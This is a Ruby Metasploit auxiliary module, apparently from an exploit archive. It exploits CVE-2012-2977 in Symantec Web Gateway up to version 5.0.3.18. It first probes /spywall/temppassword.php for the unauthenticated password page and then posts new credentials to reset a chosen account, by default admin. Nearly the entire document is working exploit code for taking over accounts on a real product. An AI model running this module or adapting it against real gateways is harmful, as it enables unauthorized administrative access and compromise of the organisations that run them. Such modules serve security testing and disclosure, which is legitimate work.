require 'msf/core'  

class Metasploit3 < Msf::Auxiliary  

include Msf::Exploit::Remote::HttpClient  

def initialize(info={})  
super(update_info(info,  
'Name' => "Symantec Web Gateway < = 5.0.3.18 Arbitrary Password Change",  
'Description' => %q{  
This module will change the password for the specified account on a Symantec Web Gatewaye server.  
},  
'License' => MSF_LICENSE,  
'Version' => "$Revision: 0 $",  
'Author' =>  
[  
'Kc57',  
],  
'References' =>  
[  
[ 'CVE', '2012-2977' ],  
[ 'OSVDB', '0' ],  
[ 'BID', '54430' ],  
[ 'URL', 'http://www.securityfocus.com/bid/54430' ],  
],  
'DisclosureDate' => "Jul 23 2012" ))  

register_options(  
[  
Opt::RPORT(80),  
OptString.new('USER', [ true, 'The password to reset to', 'admin']),  
OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])  
], self.class)  
end  

def run  

print_status("Attempting to connect to https://#{rhost}/spywall/temppassword.php to reset password")  
res = send_request_raw(  
{  
'method' => 'POST',  
'uri' => '/spywall/temppassword.php',  
}, 25)  

#check to see if we get HTTP OK  
if (res.code == 200)  
print_status("Okay, Got an HTTP 200 (okay) code. Checking if exploitable")  
else  
print_error("Did not get HTTP 200, URL was not found. Exiting!")  
return  
end  

#Check to if the temppassword.php page loads or if we are redirected to the login page  
if (res.body.match(/Please Select a New Password/i))  
print_status("Server is vulnerable!")  
else  
print_error("Target doesn't seem to be vulnerable!")  
return  
end  

print_status("Attempting to exploit password change vulnerability on #{rhost}")  
print_status("Attempting to reset #{datastore['USER']} password to #{datastore['PASSWORD']}")  

data = 'target=executive_summary.php'  
data < < '&USERNAME=' + datastore['USER']  
data << '&password=' + datastore['PASSWORD']  
data << '&password2=' + datastore['PASSWORD']  
data << '&Save=Save'  

res = send_request_cgi(  
{  
'method' => 'POST',  
'uri' => '/spywall/temppassword.php',  
'data' => data,  
}, 25)  

if res.code == 200  
if (res.body.match(/Thank you/i))  
print_status("Password reset was successful!\n")  
else  
print_error("Password reset failed! User '#{datastore['USER']}' may not exist.\n")  
end  
else  
print_error("Password reset failed!")  
end  
end  
end
Comments
Write a Comment